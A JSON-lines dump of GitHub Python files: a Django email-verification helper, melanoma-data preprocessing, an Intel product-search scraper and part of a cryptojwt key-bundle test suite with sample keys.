kwargs.get('expiry')\n token, expiry = default_token_generator.make_token(user, expiry_)\n\n senderr = _get_validated_field('EMAIL_FROM_ADDRESS')\n domain = _get_validated_field('EMAIL_PAGE_DOMAIN')\n subject = _get_validated_field('EMAIL_MAIL_SUBJECT')\n mail_plain = _get_validated_field('EMAIL_MAIL_PLAIN')\n mail_html = _get_validated_field('EMAIL_MAIL_HTML')\n\n args = (user, token, expiry, senderr, domain, subject, mail_plain, mail_html)\n if thread:\n t = Thread(target=send_email_thread, args=args)\n t.start()\n else:\n send_email_thread(*args)\n except AttributeError:\n raise Exception('The user model you provided is invalid')\n\n\ndef send_email_thread(user, token, expiry, senderr, domain, subject, mail_plain, mail_html):\n domain += '/' if not domain.endswith('/') else ''\n\n def has_decorator(k):\n if callable(k):\n return k.__dict__.get('django_email_verification_view_id', False)\n return False\n\n d = [v[0][0] for k, v in get_resolver(None).reverse_dict.items() if has_decorator(k)]\n w = [a[0] for a in d if a[1] == []]\n d = [a[0][:a[0].index('%')] for a in d if a[1] != []]\n\n if len(w) > 0:\n print(f'{DJANGO_EMAIL_VERIFICATION_NO_PARAMETER_WARNING}: {w}')\n\n if len(d) < 1:\n print(DJANGO_EMAIL_VERIFICATION_NO_VIEWS_ERROR)\n return\n\n if len(d) > 1:\n print(f'{DJANGO_EMAIL_VERIFICATION_MORE_VIEWS_ERROR}: {d}')\n return\n try:\n context = {'link': domain + d[0] + str(token), 'expiry': expiry, 'user': user}\n except Exception as e:\n print(e)\n\n subject = Template(subject).render(Context(context))\n\n text = render_to_string(mail_plain, context)\n\n html = render_to_string(mail_html, context)\n\n msg = EmailMultiAlternatives(subject, text, senderr, [user.email])\n msg.attach_alternative(html, 'text/html')\n msg.send()\n print(f\"Sending email confirmation to user {user}\")\n\n\ndef _get_validated_field(field, default_type=None):\n if default_type is None:\n default_type = str\n try:\n d = getattr(settings, field)\n if d == \"\" or d is None or not isinstance(d, default_type):\n raise AttributeError\n return d\n except AttributeError:\n raise Exception(f\"Field {field} missing or invalid\")\n\n\ndef verify_token(token):\n valid, user = default_token_generator.check_token(token)\n if valid:\n callback = _get_validated_field('EMAIL_VERIFIED_CALLBACK', default_type=Callable)\n if hasattr(user, callback.__name__):\n getattr(user, callback.__name__)()\n else:\n callback(user)\n user.last_login = timezone.now()\n user.save()\n return valid, user\n return False, None\n\n\ndef verify_view(func):\n func.django_email_verification_view_id = True\n\n @functools.wraps(func)\n def verify_function_wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return verify_function_wrapper\n","repo_name":"laylay1234/bemoSender-API","sub_path":"bemoSender-API/utils/email_verification.py","file_name":"email_verification.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15802705480","text":"import os\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom PIL import Image\nfrom tqdm import tqdm\n\nif __name__==\"__main__\":\n input_path = \"/home/dragoshh1984/repos/kaggle/datasets/melanomia_classification/\"\n train_path = \"/home/dragoshh1984/repos/kaggle/datasets/melanomia_classification/512x512-dataset-melanoma/512x512-dataset-melanoma\"\n test_path = \"/home/dragoshh1984/repos/kaggle/datasets/melanomia_classification/512x512-test/512x512-test\"\n\n df_train = pd.read_csv(os.path.join(input_path, \"folds_big.csv\"))\n df_test = pd.read_csv(os.path.join(input_path, \"test.csv\"))\n df_test = df_test.rename(columns={\"image_name\": \"image_id\"})\n\n df_train['sex'] = df_train['sex'].fillna('unknown')\n df_train['anatom_site_general_challenge'] = df_train['anatom_site_general_challenge'].fillna('unknown')\n df_train['age_approx'] = df_train['age_approx'].fillna(round(df_train['age_approx'].mean()))\n\n df_test['sex'] = df_test['sex'].fillna('unknown')\n df_test['anatom_site_general_challenge'] = df_test['anatom_site_general_challenge'].fillna('unknown')\n df_test['age_approx'] = df_test['age_approx'].fillna(round(df_test['age_approx'].mean()))\n\n # get color mean\n train_means = []\n for image_name in tqdm(df_train.image_id):\n color_mean = np.array(Image.open(os.path.join(train_path, f\"{image_name}.jpg\"))).mean()\n train_means.append(color_mean)\n df_train.loc[:, 'color_mean'] = train_means\n\n test_means = []\n for image_name in tqdm(df_test.image_id):\n color_mean = np.array(Image.open(os.path.join(test_path, f\"{image_name}.jpg\"))).mean()\n test_means.append(color_mean)\n df_test.loc[:, 'color_mean'] = test_means\n\n # label anatom_challenge\n le = LabelEncoder()\n types = df_train['anatom_site_general_challenge'].unique()\n df_train['anatom_site_general_challenge'] = le.fit_transform(df_train['anatom_site_general_challenge'])\n\n types = df_test['anatom_site_general_challenge'].unique()\n df_test['anatom_site_general_challenge'] = le.fit_transform(df_test['anatom_site_general_challenge'])\n\n # encode sex\n types = df_train['sex'].unique()\n df_train['sex'] = le.fit_transform(df_train['sex'])\n\n types = df_test['sex'].unique()\n df_test['sex'] = le.fit_transform(df_test['sex'])\n\n df_train.to_csv(os.path.join(input_path, \"new_train.csv\"), index=False)\n df_test.to_csv(os.path.join(input_path, \"new_test.csv\"), index=False)\n# df_folds.loc[:, 'fold'] = 0","repo_name":"dragoshh1984/melanomia-classification","sub_path":"metadata_augmentation.py","file_name":"metadata_augmentation.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13808078702","text":"import pandas as pd\r\nimport numpy as np\r\nimport os\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\n\r\nfrom datetime import datetime\r\nimport time\r\nimport warnings\r\nwarnings.simplefilter(action='ignore', category=FutureWarning) #filters pandas .append futurewarning messages\r\nfrom selenium import webdriver\r\n\r\n\r\n#web-scraping extractor for product data - specify terms internally or via external document to feed in\r\ndef selenium_bs4_extractor(terms, web_driver_file_location):\r\n results_df = pd.DataFrame()\r\n for term in terms:\r\n url = f'https://www.intel.com/content/www/us/en/search.html?ws=text#q={term}&sort=%40lastmodifieddt%20descending&f:@tabfilter=[Developers]'\r\n driver = webdriver.Chrome(web_driver_file_location)\r\n driver.get(url)\r\n time.sleep(10)\r\n X_Path_Show_More = '//*[@id=\"viewFullDescLink\"]'\r\n elements = driver.find_elements_by_xpath(X_Path_Show_More)\r\n for element in elements:\r\n driver.execute_script(\"arguments[0].click();\", element)\r\n X_Path_Next_Page = '//*[@id=\"result-section\"]/div[9]/ul/li[8]/span'\r\n time.sleep(5)\r\n soup=BeautifulSoup(driver.page_source,'html.parser')\r\n page_counter = 1 #used for T/S purposes and error tracking\r\n try:\r\n max_page_count_combined = soup.find('li', {'class': 'coveo-pager-total', 'style':'display: inline-block;'}).text\r\n max_page_count = int(re.sub('of','', str(max_page_count_combined))) + 1\r\n except:\r\n max_page_count = 2 #only one page available to pull from\r\n #intermediate_terms_df = pd.DataFrame() #creating intermediate df for troubleshooting purposes, optional\r\n while page_counter < max_page_count:\r\n time.sleep(5)\r\n soup=BeautifulSoup(driver.page_source,'html.parser')\r\n elements = driver.find_elements_by_xpath(X_Path_Show_More)\r\n try:\r\n for element in elements:\r\n driver.execute_script(\"arguments[0].click();\", element)\r\n all_results = soup.find_all(\"div\", {\"class\": \"mobviewBtn\"})\r\n for item in all_results:\r\n version = item.find(\"span\", {\"class\": \"CoveoFieldValue\", \"data-field\": \"@version\"}) # version field\r\n if version is None:\r\n version = item.find(\"span\", {\"class\": \"CoveoFieldValue\", \"data-field\": \"@allversions\"})\r\n else:\r\n pass\r\n version = version.get_text().strip()\r\n # version_number = re.findall('\\d+\\.\\d+', str(version))\r\n try:\r\n version = re.sub('Version: ', '', str(version))\r\n except:\r\n pass\r\n for id_num in item.find_all(\"span\", {\"class\": \"CoveoFieldValue\", \"data-field\": \"@docuniqueid\"}): #_id field\r\n #print(int(s) for s in item.get_text().strip().split() if s.isdigit())\r\n item_adjusted = str(id_num.get_text().strip()).replace(\" \", \"\")\r\n lists = re.findall('\\d+',item_adjusted)\r\n for i in lists:\r\n if i == \"\":\r\n del i\r\n else:\r\n id = i\r\n try:\r\n description = item.find(\"span\", {\"class\": \"CoveoFieldValue\", \"data-field\": \"@description\",\"data-html-value\": \"true\"})\r\n description = description.get_text().strip()\r\n except:\r\n #description = item.find(\"span\", {\"class\": \"viewFullDesc\"})\r\n description = item.find(\"span\", {\"class\": \"fullDesc\"})\r\n description.a.clear()\r\n description = description.get_text().strip()\r\n date_raw = item.find(\"span\", {\"class\": \"CoveoFieldValue\", \"data-field\": \"@lastmodifieddt\",\"data-helper\": \"dateFormat\"})\r\n #print(item.get_text().strip())\r\n # searching string\r\n match_str = re.search(r'\\d{2}/\\d{2}/\\d{4}', str(date_raw))\r\n # computed date\r\n # feeding format\r\n date = datetime.strptime(match_str.group(), '%m/%d/%Y').date()\r\n name = item.find(\"a\", {\"class\": \"CoveoResultLink\"})\r\n name = name.get_text().strip()\r\n try:\r\n web_link = item.find(\"a\", {\"aria-label\": f\"{name}\", \"data-field\": \"@secondaryurl\"})['href']\r\n web_link = str('https://intel.com') + str(web_link)\r\n except:\r\n web_link = ''\r\n multiple_coveos_first = item.find(\"div\", {\"class\":\"coveo-result-cell mobile\"})\r\n next_siblings = multiple_coveos_first.find_next_siblings(\"div\", {\"class\":\"coveo-result-cell mobile\"})\r\n file_full = next_siblings[0].text.strip()\r\n file_adjusted = re.sub('File: ','',file_full)\r\n content_type_full = next_siblings[1].text.strip()\r\n content_type_adjusted = re.sub('Content Type: ', '', content_type_full)\r\n results_dict = {'search_term': term,\r\n 'version': version,\r\n '_id': id,\r\n 'description': description,\r\n 'date': date,\r\n 'file': file_adjusted,\r\n 'content_type': content_type_adjusted,\r\n 'name': name,\r\n 'web_link': web_link\r\n }\r\n results_df = results_df.append(results_dict, ignore_index=True)\r\n #intermediate_terms_df.append(results_dict, ignore_index=True) #optional, intermediate df for troubleshooting\r\n except:\r\n print(f'error on page {page_counter} for term {term} encountered')\r\n pass\r\n try:\r\n driver.find_element_by_xpath(X_Path_Next_Page).click()\r\n except:\r\n time.sleep(5)\r\n try:\r\n driver.find_element_by_xpath(X_Path_Next_Page).click()\r\n except:\r\n print(f'page_counter at value of {page_counter} with recorded maximum of {max_page_count}')\r\n time.sleep(5)\r\n page_counter += 1\r\n # print(page_counter)\r\n\r\n #intermediate_terms_df.to_csv(INSERT_PATH_HERE_IF_DESIRED, encoding='utf-8') #for troubleshooting, optional\r\n driver.close()\r\n return results_df\r\n\r\nif __name__ == \"__main__\":\r\n # setting up webdriver for scraping\r\n options = webdriver.ChromeOptions()\r\n options.add_argument('--headless')\r\n # client terms list to loop through\r\n terms = ['processor','future', \"'cutting%20edge'\"] #terms can either be directly added into a list or put into an outside file to load as an argument for automation\r\n web_driver_file_location = r'C:\\Users\\insert_file_path_here_for_web_driver'\r\n results_df = selenium_bs4_extractor(terms, web_driver_file_location)\r\n output_file_location = r'C:\\Users\\insert_file_path_here'\r\n results_df.to_csv(output_file_location, encoding='utf-8')\r\n","repo_name":"dlabban/web_scrapers","sub_path":"intel_products_scraper/intel_product_search_web_scraper_publicedit.py","file_name":"intel_product_search_web_scraper_publicedit.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8261629569","text":"# pylint: disable=missing-docstring,no-self-use\nimport json\nimport os\nimport shutil\nimport time\nfrom pathlib import Path\n\nimport pytest\nimport requests\nimport responses\nfrom cryptography.hazmat.primitives.asymmetric import rsa\n\nfrom cryptojwt.exception import UnknownKeyType\nfrom cryptojwt.jwk.ec import ECKey\nfrom cryptojwt.jwk.ec import new_ec_key\nfrom cryptojwt.jwk.hmac import SYMKey\nfrom cryptojwt.jwk.okp import OKPKey\nfrom cryptojwt.jwk.okp import new_okp_key\nfrom cryptojwt.jwk.rsa import RSAKey\nfrom cryptojwt.jwk.rsa import import_rsa_key_from_cert_file\nfrom cryptojwt.jwk.rsa import new_rsa_key\nfrom cryptojwt.key_bundle import KeyBundle\nfrom cryptojwt.key_bundle import UpdateFailed\nfrom cryptojwt.key_bundle import build_key_bundle\nfrom cryptojwt.key_bundle import dump_jwks\nfrom cryptojwt.key_bundle import init_key\nfrom cryptojwt.key_bundle import key_diff\nfrom cryptojwt.key_bundle import key_gen\nfrom cryptojwt.key_bundle import key_rollover\nfrom cryptojwt.key_bundle import keybundle_from_local_file\nfrom cryptojwt.key_bundle import rsa_init\nfrom cryptojwt.key_bundle import unique_keys\nfrom cryptojwt.key_bundle import update_key_bundle\n\n__author__ = \"Roland Hedberg\"\n\nBASE_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), \"test_keys\"))\n\nBASEDIR = os.path.abspath(os.path.dirname(__file__))\n\n\ndef full_path(local_file):\n return os.path.join(BASEDIR, local_file)\n\n\nRSAKEY = os.path.join(BASE_PATH, \"cert.key\")\nRSA0 = os.path.join(BASE_PATH, \"rsa.key\")\nEC0 = os.path.join(BASE_PATH, \"ec.key\")\nCERT = full_path(\"cert.pem\")\n\nJWK0 = {\n \"keys\": [\n {\n \"kty\": \"RSA\",\n \"e\": \"AQAB\",\n \"kid\": \"abc\",\n \"n\": \"wf-wiusGhA-gleZYQAOPQlNUIucPiqXdPVyieDqQbXXOPBe3nuggtVzeq7pVFH1dZz4dY\"\n \"2Q2LA5DaegvP8kRvoSB_87ds3dy3Rfym_GUSc5B0l1TgEobcyaep8jguRoHto6GWHfCfK\"\n \"qoUYZq4N8vh4LLMQwLR6zi6Jtu82nB5k8\",\n }\n ]\n}\n\nJWK1 = {\n \"keys\": [\n {\n \"n\": \"zkpUgEgXICI54blf6iWiD2RbMDCOO1jV0VSff1MFFnujM4othfMsad7H1kRo50YM5S\"\n \"_X9TdvrpdOfpz5aBaKFhT6Ziv0nhtcekq1eRl8mjBlvGKCE5XGk-0LFSDwvqgkJoFY\"\n \"Inq7bu0a4JEzKs5AyJY75YlGh879k1Uu2Sv3ZZOunfV1O1Orta-NvS-aG_jN5cstVb\"\n \"CGWE20H0vFVrJKNx0Zf-u-aA-syM4uX7wdWgQ-owoEMHge0GmGgzso2lwOYf_4znan\"\n \"LwEuO3p5aabEaFoKNR4K6GjQcjBcYmDEE4CtfRU9AEmhcD1kleiTB9TjPWkgDmT9MX\"\n \"sGxBHf3AKT5w\",\n \"e\": \"AQAB\",\n \"kty\": \"RSA\",\n \"kid\": \"rsa1\",\n },\n {\n \"k\": \"YTEyZjBlMDgxMGI4YWU4Y2JjZDFiYTFlZTBjYzljNDU3YWM0ZWNiNzhmNmFlYTNkNT\" \"Y0NzMzYjE\",\n \"kty\": \"oct\",\n },\n ]\n}\n\nJWK2 = {\n \"keys\": [\n {\n \"e\": \"AQAB\",\n \"kid\": \"R3NJRW1EVHRsaUcwSXVydi14cVVoTmxhaU4zckU1MlFPa05NWGNpUUZtcw\",\n \"kty\": \"RSA\",\n \"n\": \"rp7aJD9FKKHQgLTeXLMyjB5TS51x_KqA15gBJHF2Ps-rrmcBujpMAi39D7w4\"\n \"SArr9X7DPgHekTPRV6-i46TyqnY1EXPGRb0nCg0rCmkyOAMysXhhuexu3vS7\"\n \"Fa2YPvX2zpl5svdkOOwLmHBplCTtvScz-L7N1xeknauOLF5Ct39C5Ipv-BWx\"\n \"bNrqD68uIPSOH9ZsoGKVArSI0MSmw5LB7B3i30D8FvmlJyxcEPZOFVahFCmS\"\n \"qqUXHuXV2Z0BpvgvDhzB5cSNO12clwD_fZ4CnbvuvfbBAgpVg774smz2z3ov\"\n \"6SsZ6ZD5Tc_9gE2ryLW6x0RS1y2KSME8EUI2sdJYZw\",\n \"x5c\": [\n \"MIIDOjCCAiKgAwIBAgIUJACZrVNr3gHJrde3OkQwy1lXL6owDQYJKoZIhvcN\"\n \"AQELBQAwSjELMAkGA1UEBhMCU0UxDjAMBgNVBAcMBVVtZcOlMRgwFgYDVQQK\"\n \"DA9JZGVudGl0eSBQeXRob24xETAPBgNVBAMMCGlkcHkub3JnMB4XDTIxMTEw\"\n \"MjA5MzIzOFoXDTIxMTExMjA5MzIzOFowSjELMAkGA1UEBhMCU0UxDjAMBgNV\"\n \"BAcMBVVtZcOlMRgwFgYDVQQKDA9JZGVudGl0eSBQeXRob24xETAPBgNVBAMM\"\n \"CGlkcHkub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArp7a\"\n \"JD9FKKHQgLTeXLMyjB5TS51x/KqA15gBJHF2Ps+rrmcBujpMAi39D7w4SArr\"\n \"9X7DPgHekTPRV6+i46TyqnY1EXPGRb0nCg0rCmkyOAMysXhhuexu3vS7Fa2Y\"\n \"PvX2zpl5svdkOOwLmHBplCTtvScz+L7N1xeknauOLF5Ct39C5Ipv+BWxbNrq\"\n \"D68uIPSOH9ZsoGKVArSI0MSmw5LB7B3i30D8FvmlJyxcEPZOFVahFCmSqqUX\"\n \"HuXV2Z0BpvgvDhzB5cSNO12clwD/fZ4CnbvuvfbBAgpVg774smz2z3ov6SsZ\"\n \"6ZD5Tc/9gE2ryLW6x0RS1y2KSME8EUI2sdJYZwIDAQABoxgwFjAUBgNVHREE\"\n \"DTALgglsb2NhbGhvc3QwDQYJKoZIhvcNAQELBQADggEBAARJIf6TZrhGjI/g\"\n \"QnvOybc6o3lv4nPCJojRoHjFtTd9uk9Eve4Ba7NG8goCs9l3Cq4tPUpqfW42\"\n \"iSr+1Vd9O+cozJAa6PVGwTCfHrtBvQWgM9gk+09lmP8kO73KBcmK9lcwYThJ\"\n \"NNVmZgEwV37hP6sUmyfmuAsxgePPSQqahCej1ORN9YGSH2aeXw+1rhyfTZ6c\"\n \"Kl791b+6So8bDEhfQcFmwNJ/75tr++dRnEdPfSLfid13PFT0W6uxQqeSpCh6\"\n \"TtRiqTb47SIKKnG4YPta2eVOnMNOvy2Lw4nl95V7RSvVw6VbPOx9XXYaONdm\"\n \"mSpbgK1tK1XMkhrp95sU3q1OS8I=\"\n ],\n \"x5t\": \"ScM0uv4bxGMJ7bbrc1scc_uOyLI\",\n },\n {\n \"e\": \"AQAB\",\n \"kid\": \"d1Z6RTJHQmh0NnBaeHpfYVd0U1dIb25fUTQ1aVhjNXFhWHEyTE4wbVh5bw\",\n \"kty\": \"RSA\",\n \"n\": \"zpQAmVzABLrRWV6HiBVbFeho_KhQhm8T_r6LvGP-Znnewpr6J7lBYD9gfVJo2_\"\n \"lOpCqitJvoMJoZxoULJ1xU_Am4padc-as8Sk9vb3FkvxoDrZFByNgmbrNTJCco\"\n \"wUBLTgb1wWde1CPNmr_U_-VBODOy17uTrt7DNEMqEwUi3Qb76J8duHVQT0ECcw\"\n \"crGXbsfV74jSaBAehHxlTt4tG4-LVC9I0IFs9bBykdZVh59uwtaKTlBNuC5frt\"\n \"kGyn_2TM1zCWSVparxqQ_T3e_g2NOr3v5fW_gjDsYZ2543DrE8ta_OCyrqw4wz\"\n \"fBEOb6raI6wCyqFQ5My1bz-qVTap-4hQ\",\n \"x5c\": [\n \"MIIDPjCCAiagAwIBAgIUB70yEjwKX+/dUw4YvP61BKpDHJQwDQYJKoZIhvcNAQ\"\n \"ELBQAwTDELMAkGA1UEBhMCVVMxEDAOBgNVBAcMB1NlYXR0bGUxGDAWBgNVBAoM\"\n \"D0lkZW50aXR5IFB5dGhvbjERMA8GA1UEAwwIaWRweS5vcmcwHhcNMjExMTAyMD\"\n \"kzMjM4WhcNMjExMTEyMDkzMjM4WjBMMQswCQYDVQQGEwJVUzEQMA4GA1UEBwwH\"\n \"U2VhdHRsZTEYMBYGA1UECgwPSWRlbnRpdHkgUHl0aG9uMREwDwYDVQQDDAhpZH\"\n \"B5Lm9yZzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAM6UAJlcwAS6\"\n \"0Vleh4gVWxXoaPyoUIZvE/6+i7xj/mZ53sKa+ie5QWA/YH1SaNv5TqQqorSb6D\"\n \"CaGcaFCydcVPwJuKWnXPmrPEpPb29xZL8aA62RQcjYJm6zUyQnKMFAS04G9cFn\"\n \"XtQjzZq/1P/lQTgzste7k67ewzRDKhMFIt0G++ifHbh1UE9BAnMHKxl27H1e+I\"\n \"0mgQHoR8ZU7eLRuPi1QvSNCBbPWwcpHWVYefbsLWik5QTbguX67ZBsp/9kzNcw\"\n \"lklaWq8akP093v4NjTq97+X1v4Iw7GGdueNw6xPLWvzgsq6sOMM3wRDm+q2iOs\"\n \"AsqhUOTMtW8/qlU2qfuIUCAwEAAaMYMBYwFAYDVR0RBA0wC4IJbG9jYWxob3N0\"\n \"MA0GCSqGSIb3DQEBCwUAA4IBAQAyRDDxQcaNDP93SCmZaCnRgpQU8ZnrNk+QpF\"\n \"LPlzUM+CopC5KnJuqBX3C54/uQve54/YpNTbBGGYgqB07381L7z7hn9aNylyFf\"\n \"N9Ck51/lMnG2YYjdwDwhskfsekOA9H44N3GdxYhVuSrZDr+DuS8Sve26HRzh1Z\"\n \"r+1PqSanM7pTJngGFDor7Hn02mKwAYk2HduT7ulYXxzLBcDhgagGTT86P3Jmwm\"\n \"eM6PvsICMpP/6ewzRnsfJ+tmT/WXSS9IX1ZL/UxSEiNYPyJdls83stnjAxpS41\"\n \"IKNMtebp/78p/BGG5Tm+YUPES4h5YwBUsJi3ehhdzzQXjdqSF8xe2wjs6y\"\n ],\n \"x5t\": \"WlQYbhnE2ZQvZKF45tqK5Lwmt8k\",\n },\n ]\n}\n\nif os.path.isdir(\"keys\"):\n shutil.rmtree(\"keys\")\n\n\ndef test_with_sym_key():\n kc = KeyBundle({\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"})\n assert len(kc.get(\"oct\")) == 1\n assert len(kc.get(\"rsa\")) == 0\n assert kc.remote is False\n assert kc.source is None\n\n\ndef test_with_2_sym_key():\n a = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n b = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb = KeyBundle([a, b])\n assert len(kb.get(\"oct\")) == 2\n assert len(kb) == 2\n\n assert kb.get_key_with_kid(\"kid\") is None\n assert len(kb.kids()) == 2\n\n\ndef test_remove_sym():\n a = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n b = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb = KeyBundle([a, b])\n assert len(kb) == 2\n keys = kb.get(\"oct\")\n kb.remove(keys[0])\n assert len(kb) == 1\n\n\ndef test_remove_key_sym():\n a = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n b = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb = KeyBundle([a, b])\n assert len(kb) == 2\n keys = kb.get(\"oct\")\n kb.remove(keys[0])\n assert len(kb) == 1\n\n # This should not work\n kb.remove_keys_by_type(\"rsa\")\n # should still be one\n assert len(kb) == 1\n\n\ndef test_rsa_init():\n kb = rsa_init({\"use\": [\"enc\", \"sig\"], \"size\": 1024, \"name\": \"rsa\", \"path\": \"keys\"})\n assert kb\n assert len(kb) == 2\n assert len(kb.get(\"rsa\")) == 2\n\n\ndef test_rsa_init_under_spec():\n kb = rsa_init({\"use\": [\"enc\", \"sig\"], \"size\": 1024})\n assert kb\n assert len(kb) == 2\n assert len(kb.get(\"rsa\")) == 2\n\n\ndef test_unknown_source():\n with pytest.raises(ImportError):\n KeyBundle(source=\"foobar\")\n\n\ndef test_ignore_unknown_types():\n kb = KeyBundle(\n {\n \"kid\": \"q-H9y8iuh3BIKZBbK6S0mH_isBlJsk\"\n \"-u6VtZ5rAdBo5fCjjy3LnkrsoK_QWrlKB08j_PcvwpAMfTEDHw5spepw\",\n \"use\": \"sig\",\n \"alg\": \"EdDSA\",\n \"kty\": \"XXX\",\n \"crv\": \"Ed25519\",\n \"x\": \"FnbcUAXZ4ySvrmdXK1MrDuiqlqTXvGdAaE4RWZjmFIQ\",\n }\n )\n\n assert len(kb) == 0\n\n\ndef test_remove_rsa():\n kb = rsa_init({\"use\": [\"enc\", \"sig\"], \"size\": 1024, \"name\": \"rsa\", \"path\": \"keys\"})\n assert len(kb) == 2\n keys = kb.get(\"rsa\")\n assert len(keys) == 2\n kb.remove(keys[0])\n assert len(kb) == 1\n\n\ndef test_key_mix():\n kb = rsa_init({\"use\": [\"enc\", \"sig\"], \"size\": 1024, \"name\": \"rsa\", \"path\": \"keys\"})\n _sym = SYMKey(**{\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"})\n kb.append(_sym)\n assert len(kb) == 3\n assert len(kb.get(\"rsa\")) == 2\n assert len(kb.get(\"oct\")) == 1\n\n kb.remove(_sym)\n\n assert len(kb) == 2\n assert len(kb.get(\"rsa\")) == 2\n assert len(kb.get(\"oct\")) == 0\n\n\ndef test_get_all():\n kb = rsa_init({\"use\": [\"enc\", \"sig\"], \"size\": 1024, \"name\": \"rsa\", \"path\": \"keys\"})\n _sym = SYMKey(**{\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"})\n kb.append(_sym)\n assert len(kb.get()) == 3\n\n _k = kb.keys()\n assert len(_k) == 3\n\n\ndef test_keybundle_from_local_der():\n kb = keybundle_from_local_file(\"{}\".format(RSA0), \"der\", [\"enc\"])\n assert len(kb) == 1\n keys = kb.get(\"rsa\")\n assert len(keys) == 1\n _key = keys[0]\n assert isinstance(_key, RSAKey)\n assert _key.kid\n\n\ndef test_ec_keybundle_from_local_der():\n kb = keybundle_from_local_file(\"{}\".format(EC0), \"der\", [\"enc\"], keytype=\"EC\")\n assert len(kb) == 1\n keys = kb.get(\"ec\")\n assert len(keys) == 1\n _key = keys[0]\n assert _key.kid\n assert isinstance(_key, ECKey)\n\n\ndef test_keybundle_from_local_der_update():\n kb = keybundle_from_local_file(\"file://{}\".format(RSA0), \"der\", [\"enc\"])\n assert len(kb) == 1\n keys = kb.get(\"rsa\")\n assert len(keys) == 1\n _key = keys[0]\n assert _key.kid\n assert isinstance(_key, RSAKey)\n\n kb.update()\n\n # Nothing should change\n assert len(kb) == 1\n keys = kb.get(\"rsa\")\n assert len(keys) == 1\n _key = keys[0]\n assert _key.kid\n assert isinstance(_key, RSAKey)\n\n\ndef test_creat_jwks_sym():\n a = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n kb = KeyBundle([a])\n _jwks = kb.jwks()\n _loc = json.loads(_jwks)\n assert list(_loc.keys()) == [\"keys\"]\n assert set(_loc[\"keys\"][0].keys()) == {\"kty\", \"use\", \"k\", \"kid\"}\n\n\ndef test_keybundle_from_local_jwks_file():\n kb = keybundle_from_local_file(\n \"file://{}\".format(os.path.join(BASE_PATH, \"jwk.json\")), \"jwks\", [\"sig\"]\n )\n assert len(kb) == 1\n\n\ndef test_keybundle_from_local_jwks():\n kb = keybundle_from_local_file(\n \"{}\".format(os.path.join(BASE_PATH, \"jwk.json\")), \"jwks\", [\"sig\"]\n )\n assert len(kb) == 1\n\n\ndef test_update():\n kc = KeyBundle([{\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}])\n assert len(kc.get(\"oct\")) == 1\n assert len(kc.get(\"rsa\")) == 0\n assert kc.remote is False\n assert kc.source is None\n\n kc.update() # Nothing should happen\n assert len(kc.get(\"oct\")) == 1\n assert len(kc.get(\"rsa\")) == 0\n assert kc.remote is False\n assert kc.source is None\n\n\ndef test_update_RSA():\n kc = keybundle_from_local_file(RSAKEY, \"der\", [\"sig\"])\n assert kc.remote is False\n assert len(kc.get(\"oct\")) == 0\n assert len(kc.get(\"RSA\")) == 1\n\n key = kc.get(\"RSA\")[0]\n assert isinstance(key, RSAKey)\n\n kc.update()\n assert kc.remote is False\n assert len(kc.get(\"oct\")) == 0\n assert len(kc.get(\"RSA\")) == 1\n\n key = kc.get(\"RSA\")[0]\n assert isinstance(key, RSAKey)\n\n\ndef test_outdated():\n a = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n b = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb = KeyBundle([a, b])\n keys = kb.keys()\n now = time.time()\n keys[0].inactive_since = now - 60\n kb.remove_outdated(30)\n assert len(kb) == 1\n\n\ndef test_dump_jwks():\n a = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n b = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb2 = KeyBundle([a, b])\n\n kb1 = rsa_init({\"use\": [\"enc\", \"sig\"], \"size\": 1024, \"name\": \"rsa\", \"path\": \"keys\"})\n\n # Will not dump symmetric keys\n dump_jwks([kb1, kb2], \"jwks_combo\")\n\n # Now read it\n\n nkb = KeyBundle(source=\"file://jwks_combo\", fileformat=\"jwks\")\n\n assert len(nkb) == 2\n # both RSA keys\n assert len(nkb.get(\"rsa\")) == 2\n\n # Will dump symmetric keys\n dump_jwks([kb1, kb2], \"jwks_combo\", symmetric_too=True)\n\n # Now read it\n nkb = KeyBundle(source=\"file://jwks_combo\", fileformat=\"jwks\")\n\n assert len(nkb) == 4\n # two RSA keys\n assert len(nkb.get(\"rsa\")) == 2\n # two symmetric keys\n assert len(nkb.get(\"oct\")) == 2\n\n\ndef test_mark_as_inactive():\n desc = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n kb = KeyBundle([desc])\n assert len(kb.keys()) == 1\n for k in kb.keys():\n kb.mark_as_inactive(k.kid)\n desc = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb.add_jwk_dicts([desc])\n assert len(kb.keys()) == 2\n assert len(kb.active_keys()) == 